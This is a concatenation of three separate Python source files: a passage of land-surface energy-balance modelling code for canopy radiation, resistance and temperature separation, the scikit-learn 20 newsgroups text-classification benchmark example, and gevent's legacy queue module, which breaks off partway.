# Weighted live/dead leaf average properties
ameanv = aleafv * fg + adeadv * (1. - fg)
ameann = aleafn * fg + adeadn * (1. - fg)
ameanl = aleafl * fg + adeadl * (1. - fg)
# DIFFUSE COMPONENT
# *******************************
# canopy reflection (deep canopy)
akd = -0.0683 * np.log(F) + 0.804 # Fit to Fig 15.4 for x=1
rcpyn = (1.0 - np.sqrt(ameann)) / (1.0 + np.sqrt(ameann)) # Eq 15.7
rcpyv = (1.0 - np.sqrt(ameanv)) / (1.0 + np.sqrt(ameanv))
rcpyl = (1.0 - np.sqrt(ameanl)) / (1.0 + np.sqrt(ameanl))
rdcpyn = 2.0 * akd * rcpyn / (akd + 1.0) # Eq 15.8
rdcpyv = 2.0 * akd * rcpyv / (akd + 1.0)
rdcpyl = 2.0 * akd * rcpyl / (akd + 1.0)
# canopy transmission (VIS)
expfac = np.sqrt(ameanv) * akd * F
expfac[expfac < 0.001] = 0.001
xnum = (rdcpyv * rdcpyv - 1.0) * np.exp(-expfac)
xden = (rdcpyv * rsoilv - 1.0) + rdcpyv * (rdcpyv - rsoilv) * np.exp(-2.0 * expfac)
taudv = xnum / xden # Eq 15.11
# canopy transmission (NIR)
expfac = np.sqrt(ameann) * akd * F
expfac[expfac < 0.001] = 0.001
xnum = (rdcpyn * rdcpyn - 1.0) * np.exp(-expfac)
xden = (rdcpyn * rsoiln - 1.0) + rdcpyn * (rdcpyn - rsoiln) * np.exp(-2.0 * expfac)
taudn = xnum / xden # Eq 15.11
# canopy transmission (LW)
taudl = np.exp(-np.sqrt(ameanl) * akd * F)
# diffuse albedo for generic canopy
fact = ((rdcpyn - rsoiln) / (rdcpyn * rsoiln - 1.0)) * np.exp(-2.0 * np.sqrt(ameann) * akd * F) # Eq 15.9
albdn = (rdcpyn + fact) / (1.0 + rdcpyn * fact)
fact = ((rdcpyv - rsoilv) / (rdcpyv * rsoilv - 1.0)) * np.exp(-2.0 * np.sqrt(ameanv) * akd * F) # Eq 15.9
albdv = (rdcpyv + fact) / (1.0 + rdcpyv * fact)
# BEAM COMPONENT
# *******************************
# canopy reflection (deep canopy)
akb = 0.5 / np.cos(zs)
akb[np.cos(zs) <= 0.01] = 0.5
rcpyn = (1.0 - np.sqrt(ameann)) / (1.0 + np.sqrt(ameann)) # Eq 15.7
rcpyv = (1.0 - np.sqrt(ameanv)) / (1.0 + np.sqrt(ameanv))
rbcpyn = 2.0 * akb * rcpyn / (akb + 1.0) # Eq 15.8
rbcpyv = 2.0 * akb * rcpyv / (akb + 1.0)
# beam albedo for generic canopy
fact = ((rbcpyn - rsoiln) / (rbcpyn * rsoiln - 1.0)) * np.exp(-2.0 * np.sqrt(ameann) * akb * F) # Eq 15.9
albbn = (rbcpyn + fact) / (1.0 + rbcpyn * fact)
fact = ((rbcpyv - rsoilv) / (rbcpyv * rsoilv - 1.0)) * np.exp(-2.0 * np.sqrt(ameanv) * akb * F) # Eq 15.9
albbv = (rbcpyv + fact) / (1.0 + rbcpyv * fact)
# weighted albedo (canopy)
albedo_c = fvis * (dirvis * albbv + difvis * albdv) + fnir * (dirnir * albbn + difnir * albdn)
ind = np.cos(zs) <= 0.01
albedo_c[ind] = (fvis[ind] * (difvis[ind] * albdv[ind]) + fnir[ind] * (difnir[ind] * albdn[ind]))
albedo_s = fvis * rsoilv + fnir * rsoiln
albedo_avg = (fc * albedo_c) + ((1 - fc) * albedo_s)
diff = albedo_avg - albedo
ind = np.logical_and((fc < 0.75), (diff <= -0.01))
rsoilv[ind] = rsoilv[ind] + 0.01
ind = np.logical_and((fc < 0.75), (diff > 0.01))
rsoilv[ind] = rsoilv[ind] - 0.01
ind = np.logical_and((fc >= 0.75), (diff <= -0.01))
fg[ind] = fg[ind] - 0.05
ind = np.logical_and((fc >= 0.75), (diff > 0.01))
fg[ind] = fg[ind] + 0.05
fg[fg > 1.] = 1.
fg[fg < 0.01] = 0.01
if control == 1:
fg_itr = fg
rsoilv_itr = rsoilv
ind = abs(diff) > 0.05
albedo_c[ind] = albedo[ind]
albedo_s[ind] = albedo[ind] # if a solution is not reached, alb_c=alb_s=alb
# Direct beam+scattered canopy transmission coeff (visible)
expfac = np.sqrt(ameanv) * akb * F
xnum = (rbcpyv * rbcpyv - 1.0) * np.exp(-expfac)
xden = (rbcpyv * rsoilv - 1.0) + rbcpyv * (rbcpyv - rsoilv) * np.exp(-2.0 * expfac)
taubtv = xnum / xden # Eq 15.11
# Direct beam+scattered canopy transmission coeff (NIR)
expfac = np.sqrt(ameann) * akb * F
xnum = (rbcpyn * rbcpyn - 1.0) * np.exp(-expfac)
xden = (rbcpyn * rsoiln - 1.0) + rbcpyn * (rbcpyn - rsoiln) * np.exp(-2.0 * expfac)
taubtn = xnum / xden # Eq 15.11
# shortwave radition components
tausolar = fvis * (difvis * taudv + dirvis * taubtv) + fnir * (difnir * taudn + dirnir * taubtn)
Rs_c = Rs_1 * (1. - tausolar)
Rs_s = Rs_1 * tausolar
return Rs_c, Rs_s, albedo_c, albedo_s, e_atm, rsoilv_itr, fg_itr
def compute_G0(Rn, Rn_s, albedo, ndvi, t_rise, t_end, time, EF_s):
w = 1 / (1 + (EF_s / 0.5) ** 8.)
c_g = (w * 0.35) + (
(1 - w) * 0.31) # maximum fraction of Rn,s that become G0 (0.35 for dry soil and 0.31 for wet soil)
t_g = (w * 100000.) + ((1 - w) * 74000.)
tnoon = 0.5 * (t_rise + t_end)
t_g0 = (time - tnoon) * 3600.
G0 = c_g * np.cos(2 * np.pi * (t_g0 + 10800.) / t_g) * Rn_s
ind = np.logical_and(ndvi <= 0, albedo <= 0.05)
G0[ind] = Rn[ind] * 0.5
return G0
# PRO compute_resistence, U, Ts, Tc, hc, F, d0, z0m, z0h, z_u, z_T, xl, leaf, leafs, leafc, fm, fh, fm_h
#
# COMMON com_res, r_ah, r_s, r_x, u_attr
def compute_resistence(U, Ts, Tc, hc, F, d0, z0m, z0h, z_u, z_T, xl, leaf, leafs, leafc, fm, fh, fm_h):
c_a = 0.004 # Free convective velocity constant for r_s modelling
c_b = 0.012 # Empirical constant for r_s modelling
c_c = 0.0025 # Empirical constant for r_s modelling (new formulation Kustas and Norman, 1999)
C = 175. # Parameter for canopy boundary-layer resistance (C=90 Grace '81, C=175 Cheubouni 2001, 144 Li '98)
# Computation of friction velocity and aerodynamic resistance
u_attr = 0.41 * U / ((np.log((z_u - d0) / z0m)) - fm)
u_attr[u_attr == 0] = 10.
u_attr[u_attr < 0] = 0.01
r_ah = ((np.log((z_T - d0) / z0h)) - fh) / u_attr / 0.41
r_ah[r_ah == 0] = 500.
r_ah[r_ah <= 1.] = 1.
# Computation of the resistance of the air between soil and canopy space
Uc = u_attr / 0.41 * ((np.log((hc - d0) / z0m)) - fm_h)
Uc[Uc <= 0] = 0.1
Us = Uc * np.exp(-leaf * (1. - (0.05 / hc)))
r_ss = 1. / (c_a + (c_b * (Uc * np.exp(-leafs * (1. - (0.05 / hc))))))
r_s1 = 1. / ((((abs(Ts - Tc)) ** (1. / 3.)) * c_c) + (c_b * Us))
r_s2 = 1. / (c_a + (c_b * Us))
r_s = (((r_ss - 1.) / 0.09 * (F - 0.01)) + 1.)
r_s[F > 0.1] = r_s1[F > 0.1] # linear fuction between 0(bare soil) anf the value at F=0.1
r_s[abs(Ts - Tc) < 1.] = r_s2[abs(Ts - Tc) < 1.]
r_s[F > 3.] = r_s2[F > 3.]
# Computation of the canopy boundary layer resistance
Ud = Uc * np.exp(-leafc * (1. - ((d0 + z0m) / hc)))
Ud[Ud <= 0.] = 100.
r_x = C / F * ((xl / Ud) ** 0.5)
r_x[Ud == 100.] = 0.1
return r_ah, r_s, r_x, u_attr
# PRO compute_Rn, albedo_c, albedo_s, t_air, Tc, Ts, e_atm, Rs_c, Rs_s, F
#
# COMMON com_Rn, Rn_s, Rn_c, Rn
def compute_Rn(albedo_c, albedo_s, t_air, Tc, Ts, e_atm, Rs_c, Rs_s, F):
kL = 0.95 # long-wave extinction coefficient [-]
eps_s = 0.94 # Soil Emissivity [-]
eps_c = 0.99 # Canopy emissivity [-]
Lc = eps_c * 0.0000000567 * (Tc ** 4.)
Ls = eps_s * 0.0000000567 * (Ts ** 4.)
Rle = e_atm * 0.0000000567 * (t_air ** 4.)
Rn_c = ((1. - albedo_c) * Rs_c) + ((1. - np.exp(-kL * F)) * (Rle + Ls - 2. * Lc))
Rn_s = ((1. - albedo_s) * Rs_s) + ((np.exp(-kL * F)) * Rle) + ((1. - np.exp(-kL * F)) * Lc) - Ls
Rn = Rn_s + Rn_c
return Rn_s, Rn_c, Rn
# PRO temp_separation, H_c, fc, t_air, t0, r_ah, r_x, r_s, r_air
#
# COMMON com_sep, Tc, Ts, Tac
def temp_separation(H_c, fc, t_air, t0, r_ah, r_x, r_s, r_air, cp):
Tc_lin = ((t_air / r_ah) + (t0 / r_s / (1. - fc)) + (
H_c * r_x / r_air / cp * ((1. / r_ah) + (1. / r_s) + (1. / r_x)))) / (
(1. / r_ah) + (1. / r_s) + (fc / r_s / (1. - fc)))
Td = (Tc_lin * (1 + (r_s / r_ah))) - (H_c * r_x / r_air / cp * (1. + (r_s / r_x) + (r_s / r_ah))) - (
t_air * r_s / r_ah)
delta_Tc = ((t0 ** 4.) - (fc * (Tc_lin ** 4.)) - ((1. - fc) * (Td ** 4.))) / (
(4. * (1. - fc) * (Td ** 3.) * (1. + (r_s / r_ah))) + (4. * fc * (Tc_lin ** 3.)))
Tc = (Tc_lin + delta_Tc)
Tc[fc < 0.10] = t0[fc < 0.10]
Tc[fc > 0.90] = t0[fc > 0.90]
# ======get Ts==================================================================
Delta = (t0 ** 4.) - (fc * (Tc ** 4.))
Delta[Delta <= 0.] = 10.
Ts = (Delta / (1 - fc)) ** 0.25
ind = ((t0 ** 4) - (fc * Tc ** 4.)) <= 0.
Ts[ind] = (t0[ind] - (fc[ind] * Tc[ind])) / (1 - fc[ind])
Ts[fc < 0.1] = t0[fc < 0.1]
Ts[fc > 0.9] = t0[fc > 0.9]
ind = (Tc <= (t_air - 10.))
Tc[ind] = (t_air[ind] - 10.)
ind = (Tc >= t_air + 50.)
Tc[ind] = (t_air[ind] + 50.)
ind = (Ts <= (t_air - 10.))
Ts[ind] = (t_air[ind] - 10.)
ind = (Ts >= t_air + 50.)
Ts[ind] = (t_air[ind] + 50.)
Tac = ((((t_air) / r_ah) + ((Ts) / r_s) + ((Tc) / r_x)) / ((1 / r_ah) + (1 / r_s) + (1 / r_x)))
return Tc, Ts, Tac
# PRO compute_stability, H, t0, r_air, u_attr, z_u, z_T, hc, d0, z0m, z0h
#
# COMMON com_stab, fm, fh, fm_h
def compute_stability(H, t0, r_air, cp, u_attr, z_u, z_T, hc, d0, z0m, z0h):
t0[t0 == 273.16] = 373.16
L_ob = -(r_air * cp * t0 * (u_attr ** 3.0) / 0.41 / 9.806 / H)
L_ob[L_ob >= 0.] = -99.
mm = ((1. - (16. * (z_u - d0) / L_ob)) ** 0.25)
mm_h = ((1. - (16. * (hc - d0) / L_ob)) ** 0.25)
mh = ((1. - (16. * (z_T - d0) / L_ob)) ** 0.25)
ind = L_ob == -99.
mm[ind] = 0.
mm_h[ind] = 0.
mh[ind] = 0.
fm = np.zeros(mh.shape)
ind = np.logical_and((L_ob < 100.), (L_ob > (-100.)))
fm[ind] = ((2.0 * np.log((1.0 + mm[ind]) / 2.0)) + (np.log((1.0 + (mm[ind] ** 2.)) / 2.0)) - (
2.0 * np.arctan(mm[ind])) + (np.pi / 2.))
fm_h = np.zeros(mh.shape)
fm_h[ind] = ((2.0 * np.log((1.0 + mm_h[ind]) / 2.0)) + (np.log((1.0 + (mm_h[ind] ** 2.)) / 2.0)) - (
2.0 * np.arctan(mm_h[ind])) + (np.pi / 2.))
fh = np.zeros(mh.shape)
fh[ind] = ((2.0 * np.log((1.0 + (mh[ind] ** 2.)) / 2.0)))
ind = (fm == (np.log((z_u - d0) / z0m)))
fm[ind] = fm[ind] + 1.
ind = (fm_h == (np.log((hc - d0) / z0m)))
fm_h[ind] = fm_h[ind] + 1.
return fm, fh, fm_h
def smooth(signal, owidth, edge_truncate=False):
"""Replicates the IDL ``SMOOTH()`` function.
Parameters
----------
signal : array-like
The array to be smoothed.
owidth : :class:`int` or array-like
Width of the smoothing window. Can be a scalar or an array with
length equal to the number of dimensions of `signal`.
edge_truncate : :class:`bool`, optional
Set `edge_truncate` to ``True`` to apply smoothing to all points.
Points near the edge are normally excluded from smoothing.
Returns
-------
array-like
A smoothed array with the same dimesions and type as `signal`.
Notes
-----
References
----------
http://www.exelisvis.com/docs/SMOOTH.html
Examples
--------
"""
if owidth % 2 == 0:
width = owidth + 1
else:
width = owidth
if width < 3:
return signal
n = signal.size
istart = int((width - 1) / 2)
iend = n - int((width + 1) / 2)
w2 = int(width / 2)
s = signal.copy()
for i in range(n):
if i < istart:
if edge_truncate:
s[i] = (np.nansum(signal[0:istart + i + 1]) +
(istart - i) * signal[0]) / float(width)
elif i > iend:
if edge_truncate:
s[i] = (np.nansum(signal[i - istart:n]) +
(i - iend) * signal[n - 1]) / float(width)
else:
s[i] = np.nansum(signal[i - w2:i + w2 + 1]) / float(width)
return s
def Smooth(v1, w, nanopt):
# v1 is the input 2D numpy array.
# w is the width of the square window along one dimension
# nanopt can be replace or propagate
'''
v1 = np.array(
[[3.33692829e-02, 6.79152655e-02, 9.66020487e-01, 8.56235492e-01],
[3.04355923e-01, np.nan , 4.86013025e-01, 1.00000000e+02],
[9.40659566e-01, 5.23314093e-01, np.nan , 9.09669768e-01],
[1.85165123e-02, 4.44609040e-02, 5.10472165e-02, np.nan ]])
w = 2
'''
# make a copy of the array for the output:
vout = np.copy(v1)
# If w is even, add one
if w % 2 == 0:
w = w + 1
# get the size of each dim of the input:
r, c = v1.shape
# Assume that w, the width of the window is always square.
startrc = (w - 1) / 2
stopr = r - ((w + 1) / 2) + 1
stopc = c - ((w + 1) / 2) + 1
# For all pixels within the border defined by the box size, calculate the average in the window.
# There are two options:
# Ignore NaNs and replace the value where possible.
# Propagate the NaNs
for col in range(startrc, stopc):
# Calculate the window start and stop columns
startwc = col - (w / 2)
stopwc = col + (w / 2) + 1
for row in range(startrc, stopr):
# Calculate the window start and stop rows
startwr = row - (w / 2)
stopwr = row + (w / 2) + 1
# Extract the window
window = v1[startwr:stopwr, startwc:stopwc]
if nanopt == 'replace':
# If we're replacing Nans, then select only the finite elements
window = window[np.isfinite(window)]
# Calculate the mean of the window
vout[row, col] = np.mean(window)
return vout
# FUNCTION interp_ta, Ta, bad, rid
# ;mask_full = where(Ta ne bad)
# ;t_air = Ta[mask_full]
# hold=where(Ta EQ bad, vct)
# if vct GT 0 then Ta[where(Ta EQ bad)]=!values.f_nan
# t_air=Ta
# ta_m = mean(t_air,/nan)
# ta_v = sqrt(variance(t_air,/nan))
#
# mask_bad = where(abs(Ta-ta_m) gt 10*ta_v, c_bad)
# Ta_temp = Ta
# IF c_bad ne 0 THEN BEGIN
# Ta_temp[mask_bad] = !Values.F_NAN
# ENDIF
#
# rid2=sqrt(rid)
# Ta_smooth = SMOOTH(Ta_temp, rid2/1., /EDGE_TRUNCATE, MISSING=ta_m, /NAN)
#
# RETURN, Ta_smooth
# END
def interp_ta(Ta, coarseRes, fineRes):
course2fineRatio = coarseRes ** 2 / fineRes ** 2
rid2 = int(np.sqrt(course2fineRatio))
ta_m = np.nanmean(Ta)
ta_v = np.nanstd(Ta)
mask_bad = (abs(Ta - ta_m) > 10. * ta_v)
Ta[np.where(mask_bad)] = np.nan
# =====using scipy==========
# local_mean = ndimage.uniform_filter(Ta, size=rid2,mode='nearest')
# return smooth(Ta, rid2,True)
# return Smooth(Ta, rid2, 'replace')
# =====using astropy==============
# We smooth with a Gaussian kernel with stddev=1
# It is a 9x9 array
rid2 = Gaussian2DKernel(rid2)
box_2D_kernel = Box2DKernel(rid2)
local_mean = convolve(Ta, box_2D_kernel)
return local_mean
| |
"""
======================================================
Classification of text documents using sparse features
======================================================
This is an example showing how scikit-learn can be used to classify documents
by topics using a bag-of-words approach. This example uses a scipy.sparse
matrix to store the features and demonstrates various classifiers that can
efficiently handle sparse matrices.
The dataset used in this example is the 20 newsgroups dataset. It will be
automatically downloaded, then cached.
The bar plot indicates the accuracy, training time (normalized) and test time
(normalized) of each classifier.
"""
# Author: Peter Prettenhofer <peter.prettenhofer@gmail.com>
# Olivier Grisel <olivier.grisel@ensta.org>
# Mathieu Blondel <mathieu@mblondel.org>
# Lars Buitinck <L.J.Buitinck@uva.nl>
# License: BSD 3 clause
from __future__ import print_function
import logging
import numpy as np
from optparse import OptionParser
import sys
from time import time
import matplotlib.pyplot as plt
from sklearn.datasets import fetch_20newsgroups
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.feature_extraction.text import HashingVectorizer
from sklearn.feature_selection import SelectKBest, chi2
from sklearn.linear_model import RidgeClassifier
from sklearn.pipeline import Pipeline
from sklearn.svm import LinearSVC
from sklearn.linear_model import SGDClassifier
from sklearn.linear_model import Perceptron
from sklearn.linear_model import PassiveAggressiveClassifier
from sklearn.naive_bayes import BernoulliNB, MultinomialNB
from sklearn.neighbors import KNeighborsClassifier
from sklearn.neighbors import NearestCentroid
from sklearn.ensemble import RandomForestClassifier
from sklearn.utils.extmath import density
from sklearn import metrics
# Display progress logs on stdout
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(levelname)s %(message)s')
# parse commandline arguments
op = OptionParser()
op.add_option("--report",
action="store_true", dest="print_report",
help="Print a detailed classification report.")
op.add_option("--chi2_select",
action="store", type="int", dest="select_chi2",
help="Select some number of features using a chi-squared test")
op.add_option("--confusion_matrix",
action="store_true", dest="print_cm",
help="Print the confusion matrix.")
op.add_option("--top10",
action="store_true", dest="print_top10",
help="Print ten most discriminative terms per class"
" for every classifier.")
op.add_option("--all_categories",
action="store_true", dest="all_categories",
help="Whether to use all categories or not.")
op.add_option("--use_hashing",
action="store_true",
help="Use a hashing vectorizer.")
op.add_option("--n_features",
action="store", type=int, default=2 ** 16,
help="n_features when using the hashing vectorizer.")
op.add_option("--filtered",
action="store_true",
help="Remove newsgroup information that is easily overfit: "
"headers, signatures, and quoting.")
(opts, args) = op.parse_args()
if len(args) > 0:
op.error("this script takes no arguments.")
sys.exit(1)
print(__doc__)
op.print_help()
print()
###############################################################################
# Load some categories from the training set
if opts.all_categories:
categories = None
else:
categories = [
'alt.atheism',
'talk.religion.misc',
'comp.graphics',
'sci.space',
]
if opts.filtered:
remove = ('headers', 'footers', 'quotes')
else:
remove = ()
print("Loading 20 newsgroups dataset for categories:")
print(categories if categories else "all")
data_train = fetch_20newsgroups(subset='train', categories=categories,
shuffle=True, random_state=42,
remove=remove)
data_test = fetch_20newsgroups(subset='test', categories=categories,
shuffle=True, random_state=42,
remove=remove)
print('data loaded')
categories = data_train.target_names # for case categories == None
def size_mb(docs):
return sum(len(s.encode('utf-8')) for s in docs) / 1e6
data_train_size_mb = size_mb(data_train.data)
data_test_size_mb = size_mb(data_test.data)
print("%d documents - %0.3fMB (training set)" % (
len(data_train.data), data_train_size_mb))
print("%d documents - %0.3fMB (test set)" % (
len(data_test.data), data_test_size_mb))
print("%d categories" % len(categories))
print()
# split a training set and a test set
y_train, y_test = data_train.target, data_test.target
print("Extracting features from the training data using a sparse vectorizer")
t0 = time()
if opts.use_hashing:
vectorizer = HashingVectorizer(stop_words='english', non_negative=True,
n_features=opts.n_features)
X_train = vectorizer.transform(data_train.data)
else:
vectorizer = TfidfVectorizer(sublinear_tf=True, max_df=0.5,
stop_words='english')
X_train = vectorizer.fit_transform(data_train.data)
duration = time() - t0
print("done in %fs at %0.3fMB/s" % (duration, data_train_size_mb / duration))
print("n_samples: %d, n_features: %d" % X_train.shape)
print()
print("Extracting features from the test data using the same vectorizer")
t0 = time()
X_test = vectorizer.transform(data_test.data)
duration = time() - t0
print("done in %fs at %0.3fMB/s" % (duration, data_test_size_mb / duration))
print("n_samples: %d, n_features: %d" % X_test.shape)
print()
# mapping from integer feature name to original token string
if opts.use_hashing:
feature_names = None
else:
feature_names = vectorizer.get_feature_names()
if opts.select_chi2:
print("Extracting %d best features by a chi-squared test" %
opts.select_chi2)
t0 = time()
ch2 = SelectKBest(chi2, k=opts.select_chi2)
X_train = ch2.fit_transform(X_train, y_train)
X_test = ch2.transform(X_test)
if feature_names:
# keep selected feature names
feature_names = [feature_names[i] for i
in ch2.get_support(indices=True)]
print("done in %fs" % (time() - t0))
print()
if feature_names:
feature_names = np.asarray(feature_names)
def trim(s):
"""Trim string to fit on terminal (assuming 80-column display)"""
return s if len(s) <= 80 else s[:77] + "..."
###############################################################################
# Benchmark classifiers
def benchmark(clf):
print('_' * 80)
print("Training: ")
print(clf)
t0 = time()
clf.fit(X_train, y_train)
train_time = time() - t0
print("train time: %0.3fs" % train_time)
t0 = time()
pred = clf.predict(X_test)
test_time = time() - t0
print("test time: %0.3fs" % test_time)
score = metrics.accuracy_score(y_test, pred)
print("accuracy: %0.3f" % score)
if hasattr(clf, 'coef_'):
print("dimensionality: %d" % clf.coef_.shape[1])
print("density: %f" % density(clf.coef_))
if opts.print_top10 and feature_names is not None:
print("top 10 keywords per class:")
for i, category in enumerate(categories):
top10 = np.argsort(clf.coef_[i])[-10:]
print(trim("%s: %s"
% (category, " ".join(feature_names[top10]))))
print()
if opts.print_report:
print("classification report:")
print(metrics.classification_report(y_test, pred,
target_names=categories))
if opts.print_cm:
print("confusion matrix:")
print(metrics.confusion_matrix(y_test, pred))
print()
clf_descr = str(clf).split('(')[0]
return clf_descr, score, train_time, test_time
results = []
for clf, name in (
(RidgeClassifier(tol=1e-2, solver="lsqr"), "Ridge Classifier"),
(Perceptron(n_iter=50), "Perceptron"),
(PassiveAggressiveClassifier(n_iter=50), "Passive-Aggressive"),
(KNeighborsClassifier(n_neighbors=10), "kNN"),
(RandomForestClassifier(n_estimators=100), "Random forest")):
print('=' * 80)
print(name)
results.append(benchmark(clf))
for penalty in ["l2", "l1"]:
print('=' * 80)
print("%s penalty" % penalty.upper())
# Train Liblinear model
results.append(benchmark(LinearSVC(loss='l2', penalty=penalty,
dual=False, tol=1e-3)))
# Train SGD model
results.append(benchmark(SGDClassifier(alpha=.0001, n_iter=50,
penalty=penalty)))
# Train SGD with Elastic Net penalty
print('=' * 80)
print("Elastic-Net penalty")
results.append(benchmark(SGDClassifier(alpha=.0001, n_iter=50,
penalty="elasticnet")))
# Train NearestCentroid without threshold
print('=' * 80)
print("NearestCentroid (aka Rocchio classifier)")
results.append(benchmark(NearestCentroid()))
# Train sparse Naive Bayes classifiers
print('=' * 80)
print("Naive Bayes")
results.append(benchmark(MultinomialNB(alpha=.01)))
results.append(benchmark(BernoulliNB(alpha=.01)))
print('=' * 80)
print("LinearSVC with L1-based feature selection")
# The smaller C, the stronger the regularization.
# The more regularization, the more sparsity.
results.append(benchmark(Pipeline([
('feature_selection', LinearSVC(penalty="l1", dual=False, tol=1e-3)),
('classification', LinearSVC())
])))
# make some plots
indices = np.arange(len(results))
results = [[x[i] for x in results] for i in range(4)]
clf_names, score, training_time, test_time = results
training_time = np.array(training_time) / np.max(training_time)
test_time = np.array(test_time) / np.max(test_time)
plt.figure(figsize=(12, 8))
plt.title("Score")
plt.barh(indices, score, .2, label="score", color='navy')
plt.barh(indices + .3, training_time, .2, label="training time",
color='c')
plt.barh(indices + .6, test_time, .2, label="test time", color='darkorange')
plt.yticks(())
plt.legend(loc='best')
plt.subplots_adjust(left=.25)
plt.subplots_adjust(top=.95)
plt.subplots_adjust(bottom=.05)
for i, c in zip(indices, clf_names):
plt.text(-.3, i, c)
plt.show()
| |
# Copyright (c) 2009-2010 Denis Bilenko. See LICENSE for details.
"""Synchronized queues.
The :mod:`gevent.queue` module implements multi-producer, multi-consumer queues
that work across greenlets, with the API similar to the classes found in the
standard :mod:`Queue` and :class:`multiprocessing <multiprocessing.Queue>` modules.
A major difference is that queues in this module operate as channels when
initialized with *maxsize* of zero. In such case, both :meth:`Queue.empty`
and :meth:`Queue.full` return ``True`` and :meth:`Queue.put` always blocks until a call
to :meth:`Queue.get` retrieves the item.
Another interesting difference is that :meth:`Queue.qsize`, :meth:`Queue.empty`, and
:meth:`Queue.full` *can* be used as indicators of whether the subsequent :meth:`Queue.get`
or :meth:`Queue.put` will not block.
Additionally, queues in this module implement iterator protocol. Iterating over queue
means repeatedly calling :meth:`get <Queue.get>` until :meth:`get <Queue.get>` returns ``StopIteration``.
>>> queue = gevent.queue.Queue()
>>> queue.put(1)
>>> queue.put(2)
>>> queue.put(StopIteration)
>>> for item in queue:
... print item
1
2
"""
import sys
import heapq
import collections
from Queue import Full, Empty
from gevent.timeout import Timeout
from gevent.hub import get_hub, Waiter, getcurrent, _NONE
from gevent import core
__all__ = ['Queue', 'PriorityQueue', 'LifoQueue', 'JoinableQueue']
class Queue(object):
"""Create a queue object with a given maximum size.
If *maxsize* is less than zero or ``None``, the queue size is infinite.
``Queue(0)`` is a channel, that is, its :meth:`put` method always blocks until the
item is delivered. (This is unlike the standard :class:`Queue`, where 0 means
infinite size).
"""
def __init__(self, maxsize=None):
if maxsize < 0:
self.maxsize = None
else:
self.maxsize = maxsize
self.getters = set()
self.putters = set()
self._event_unlock = None
self._init(maxsize)
# QQQ make maxsize into a property with setter that schedules unlock if necessary
def _init(self, maxsize):
self.queue = collections.deque()
def _get(self):
return self.queue.popleft()
def _put(self, item):
self.queue.append(item)
def __repr__(self):
return '<%s at %s %s>' % (type(self).__name__, hex(id(self)), self._format())
def __str__(self):
return '<%s %s>' % (type(self).__name__, self._format())
def _format(self):
result = 'maxsize=%r' % (self.maxsize, )
if getattr(self, 'queue', None):
result += ' queue=%r' % self.queue
if self.getters:
result += ' getters[%s]' % len(self.getters)
if self.putters:
result += ' putters[%s]' % len(self.putters)
if self._event_unlock is not None:
result += ' unlocking'
return result
def qsize(self):
"""Return the size of the queue."""
return len(self.queue)
def empty(self):
"""Return ``True`` if the queue is empty, ``False`` otherwise."""
return not self.qsize()
def full(self):
"""Return ``True`` if the queue is full, ``False`` otherwise.
``Queue(None)`` is never full.
"""
return self.qsize() >= self.maxsize
def put(self, item, block=True, timeout=None):
"""Put an item into the queue.
If optional arg *block* is true and *timeout* is ``None`` (the default),
block if necessary until a free slot is available. If *timeout* is
a positive number, it blocks at most *timeout* seconds and raises
the :class:`Full` exception if no free slot was available within that time.
Otherwise (*block* is false), put an item on the queue if a free slot
is immediately available, else raise the :class:`Full` exception (*timeout*
is ignored in that case).
"""
if self.maxsize is None or self.qsize() < self.maxsize:
# there's a free slot, put an item right away
self._put(item)
if self.getters:
self._schedule_unlock()
elif not block and get_hub() is getcurrent():
# we're in the mainloop, so we cannot wait; we can switch() to other greenlets though
# find a getter and deliver an item to it
while self.getters:
getter = self.getters.pop()
if getter:
self._put(item)
item = self._get()
getter.switch(item)
return
raise Full
elif block:
waiter = ItemWaiter(item)
self.putters.add(waiter)
timeout = Timeout.start_new(timeout, Full)
try:
if self.getters:
self._schedule_unlock()
result = waiter.get()
assert result is waiter, "Invalid switch into Queue.put: %r" % (result, )
if waiter.item is not _NONE:
self._put(item)
finally:
timeout.cancel()
self.putters.discard(waiter)
else:
raise Full
def put_nowait(self, item):
"""Put an item into the queue without blocking.
Only enqueue the item if a free slot is immediately available.
Otherwise raise the :class:`Full` exception.
"""
self.put(item, False)
def get(self, block=True, timeout=None):
"""Remove and return an item from the queue.
If optional args *block* is true and *timeout* is ``None`` (the default),
block if necessary until an item is available. If *timeout* is a positive number,
it blocks at most *timeout* seconds and raises the :class:`Empty` exception
if no item was available within that time. Otherwise (*block* is false), return
an item if one is immediately available, else raise the :class:`Empty` exception
(*timeout* is ignored in that case).
"""
if self.qsize():
if self.putters:
self._schedule_unlock()
return self._get()
elif not block and get_hub() is getcurrent():
# special case to make get_nowait() runnable in the mainloop greenlet
# there are no items in the queue; try to fix the situation by unlocking putters
while self.putters:
putter = self.putters.pop()
if putter:
putter.switch(putter)
if self.qsize():
return self._get()
raise Empty
elif block:
waiter = Waiter()
timeout = Timeout.start_new(timeout, Empty)
try:
self.getters.add(waiter)
if self.putters:
self._schedule_unlock()
return waiter.get()
finally:
self.getters.discard(waiter)
timeout.cancel()
else:
raise Empty
def get_nowait(self):
"""Remove and return an item from the queue without blocking.
Only get an item if one is immediately available. Otherwise
raise the :class:`Empty` exception.
"""
return self.get(False)
def _unlock(self):
try:
while True:
if self.qsize() and self.getters:
getter = self.getters.pop()
if getter:
try:
item = self._get()
except:
getter.throw(*sys.exc_info())
else:
getter.switch(item)
elif self.putters and self.getters:
putter = self.putters.pop()
if putter:
getter = self.getters.pop()
if getter:
item = putter.item
putter.item = _NONE # this makes greenlet calling put() not to call _put() again
self._put(item)
item = self._get()
getter.switch(item)
putter.switch(putter)
else:
self.putters.add(putter)
elif self.putters and (self.getters or self.qsize() < self.maxsize):
putter = self.putters.pop()
putter.switch(putter)
else:
break
finally:
self._event_unlock = None # QQQ maybe it's possible to obtain this info from libevent?
# i.e. whether this event is pending _OR_ currently executing
# testcase: 2 greenlets: while True: q.put(q.get()) - nothing else has a change to execute
# to avoid this, schedule unlock with timer(0, ...) once in a while
def _schedule_unlock(self):
if self._event_unlock is None:
self._event_unlock = core.active_event(self._unlock)
# QQQ re-activate event (with event_active libevent call) instead of creating a new one each time
def __iter__(self):
return self
def next(self):
result = self.get()
if result is StopIteration:
raise result
return result
class ItemWaiter(Waiter):
__slots__ = ['item']
def __init__(self, item):
Waiter.__init__(self)
self.item = item
class PriorityQueue(Queue):
'''A subclass of :class:`Queue` that retrieves entries in priority order (lowest first).
Entries are typically tuples of the form: ``(priority number, data)``.
'''
def _init(self, maxsize):
self.queue = []
def _put(self, item, heappush=heapq.heappush):
